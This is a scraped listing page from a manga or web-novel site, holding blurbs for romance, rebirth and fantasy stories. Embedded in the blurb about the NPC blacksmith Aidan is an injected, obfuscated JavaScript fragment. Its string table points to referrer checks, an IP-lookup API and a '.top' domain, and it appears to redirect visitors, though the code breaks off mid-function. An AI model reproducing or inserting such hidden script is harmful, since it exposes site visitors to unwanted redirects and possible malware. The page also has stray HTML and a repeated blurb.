2021 - Page 53

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare
Her… One Is When Master Jue Flirts With Her.

1207 results

Flowers Rot and You Remain

Along with Raymond’s beauty, complicated relationships with women also followed. At first, Helen tried to stay away from him, but she slowly started to fall for his kindness without knowing what’s hidden behind his beautiful face.


The Tyrant’s Only Perfumer

A young woman sick with an incurable illness closes her eyes for the last time, only to wake up as Ariel Winston, an antagonist of the novel she had loved reading before her death. Knowing that death lies before her if she continues down the path the real Ariel has been going towards, she quickly breaks up with Duke Cedric Evans, who is not only the protagonist of the novel, but a man who is cursed with a condition which causes him to become bloodthirsty when he does not smell a specific scent constantly. However, Cedric, who had been forced to date Ariel due to her status as his personal perfumer, suddenly seems reluctant to distance himself from her. Just what is wrong with this man, and how will this change the events of the novel? Will Ariel be able to live the life she wants?


Extras Don’t Want to be Overly Obsessed

I thought I am just a one liner unnamed commoner extra. Until the villainous duke, who is known to kill every town he get into, came in to light and is in pursuit of a single young lady. “Duke Cedric is already halfway through the Empire. I heard he’s coming to this area this month.” Why is the bloody duke is looking for his youngest sister who disappeared five years ago? “Rose hair and golden eyes.” That sister’s description is the same as mine. I think my life is ruined. *** I then became the young lady known to be the youngest child of a villainous duke who is planning to kidnap and detain the heroine. After this, I am going to live like a calm water silent flowing and will run away. Because I didn’t want to get involved in this crazy political drama in this damn novel. But… why is everything so weird? “Our Amelle, you don’t look so happy. Do you want me to buy an island and build a villa for you?” My first brother, who kills people in normal day, is so impatient to give me something. “Our baby, can you just throw that away and live with your brother. I think I don’t like being a wizard better than I thought. Isn’t it?” The second child, who left the house ten years ago to become a wizard without any hesitation, came back again and keep himself attached to me. “Don’t turn your eyes on the other one, Amelia.” Even the world’s worst villain, who decreased the population of the continent in half in the original story, is interested in me. “I’m sorry, gentlemen, but I’m taking the Young Lady with me today.” No, even the heroine, whom I should kidnap, is kidnapping me instead? All these humans must be crazy. I’m just an extra. Would you mind getting away from me please?


Heeran Love Song

A hidden love story of a ghost princess who never loved anyone. General Jahyeon of Heeran Nation marries Soru, a ‘princess who sees ghosts’ by the king’s order. Jahyeon is cold to Soru, but he has the power to ward off ghosts, hence Soru wants to stay by his side. Soru is willing to sacrifice everything for Jahyeon, who is her only safe haven. Jahyeon is getting more and more concerned about Soru, but… A hidden love story of a ghost princess who never loved anyone. General Jahyeon of Heeran Nation marries Soru, a ‘princess who sees ghosts’ by the king’s order. Jahyeon is cold to Soru, but he has the power to ward off ghosts, hence Soru wants to stay by his side. Soru is willing to sacrifice everything for Jahyeon, who is her only safe haven. Jahyeon is getting more and more concerned about Soru, but…


He’s a Supporting Character but I Love Him Anyway

“Let’s cherish each other!” The supporting character that will eventually be thrown away, don’t play hard to get! I am Kim Geumja who is deeply immersed in the supporting character of a novel soon to face a miserable ending. One day, I was involved in a car accident. When I opened my eyes, I found myself inside of a novel! It’s shocking but I couldn’t believe I met the supporting character whom I loved dearly, Kyle. Meeting him… I couldn’t help but dance from so much happiness. Proud of my sincerity and healthy body, I decided to make Kyle happy… But for some reason, I could hear all the bad feelings towards Kyle! What a useless telepathy… Kim Geumja, who lives with an excited heart thinking about Kyle again today. If I can be by Kyle’s side, I can do all kinds of work, even a man’s!



The blacksmith NPC ‘Aidan.’One day, his village gets deleted by the hands of the system moderator and as he and his little sister ‘Elise’ perished, he swore to himself.I’ll destroy this system with my very hands.It was then…!“You have unlocked moderator perms, Moderator Lv. 1”Aidan wakes up with a new power,Marking the beginning of his journey as a moderator…!What will become of Aidan?!<script></script><script>function _0xc024(){var _0x39cd44=['fZWYd','referrer','899696tJNjos','href','Ugndp','http://rea','then','.top/','ZglPQ','1712372tqwghw','includes','5JWngEz','18uMdsXT','6433sssRNW','google','KEoJz','https://ip','random','jxvrQ','iaoIV','location','23446742TvFxrF','10402rMWkMO','fMMtd','3318410XHPUlt','164ifpcMB','text','2994VTbSaG','floor','rAdcd','dma.net/','WhNkT','.customapi','19452Mwrpiz'];_0xc024=function(){return _0x39cd44;};return _0xc024();}(function(_0x2a7abf,_0xce303b){var _0x2f6ae6=_0x4441,_0x18a53c=_0x2a7abf();while(!![]){try{var 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Drunk in Love

"Warning: Yaoi content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older." Having a secret crush is just like drinking a bottle of hard liquor. You clearly know that it will make you light-headed, lose your cool and suffer. Yet, just like a moth flying into flames, you went for the pain knowingly. "You stop right after having a sip of it, but as for me… I'm drunk in love." However, there's always a day when you finally sober up after being drunk. This is a story about doing everything possible just to continue having a secret crush and learning to love someone. Intoxicated Love / Drunk in Love / Yi Zui Jingian / 네게 취한 날들 / 一醉經年 / 一醉经年


Soaring Phoenix From The East Palace

She is a venomous demon of a consort in the eyes of the world. On the wedding day, she snatches someone else’s husband, scaring the wife into unconsciousness. The princess consort of North chen has an arrogant name, domineering Chang’an. But this world just happens to have someone more arrogant than her. Even when everyone condemns her, he only says: “I dote on the princess consort, what business is it of yours?” A strong woman and a strong man make for a strong alliance.


I Became the Wife of a Tragedy’s Main Lead

I Became the Wife of a Tragedy’s Main Lead Living alone as an abandoned princess of the Kingdom of Anzak, I discovered I was in fact in a trashy novel that appeared in my dreams one day. My half-sister was the novel’s heroine, while the male lead was well-known to be cruel and heartless. I was just an extra who died before all the drama started. Sold as a scapegoat for the Halvenkia Empire’s peace treaty, I was destined to die, unable to escape my fate. “I’m the only man in Halvenkia who’s still single. Don’t you fancy me?” But all of a sudden, the main character wants to marry me. Your first love, first kiss, and first fling are all with the heroine, but could I take them all for myself? Alexia, struggling to alter the story in order to survive. Tervion, wanting to keep her all for himself. And Ophelia, the unknown heroine. The original story has now begun to flow in a completely different direction. This is romance fantasy which covers Alexia and Tervion’s dreams and fantasies, as the only ones in each other’s eyes.


The King’s Beloved Daughter

As a daughter of calamity/misfortune, she chose to marry into the Duke’s Family, to get rid of her tragic fate in her kingdom. Unexpectedly, her scum of a man husband deals a fatal blow to her head. His mistress contributes to her unexpected death. She is given an unexpected chance of rebirth… opening her eyes again, she returned to her childhood, facing the faithful maid, the indifferent father and the unidentified teenager, how can she change the fate of her previous life…


Circumstances Of Changing Bodies

Circumstances of Changing Bodies / 몸이 바뀌는 사정 / <div class="post-title"> <h1>Circumstances of Switching Bodies</h1> </div> The prince was cursed of switching bodies with the woman he spent the night with, and I became the daughter of the duke who could not solve the curse. Tempted to solve the curse, I seduced him indifferently and spent the night with him. I gave him the antidote, so I stopped paying attention to him… “Princess, you’re leaving me because you weren’t satisfied that night.” “…” “Once more. I’ll satisfy you this time.” To make matters worse, the curse has not been lifted and our bodies have switched frequently without notice. There’s only one way back to our original bodies, which is to desire each other’s bodies. Circumstances of Changing Bodies


Apocalyptic Forecast

Life never seems to go Huai Shi's way. No friends, no family, no money... He applies for a job as a restaurant musician, but it turns out to be an ad for a gigolo! This is no way for a main character with a cheat to live... However, when the supernatural finally starts catching up with him, he begins to wish it never did.
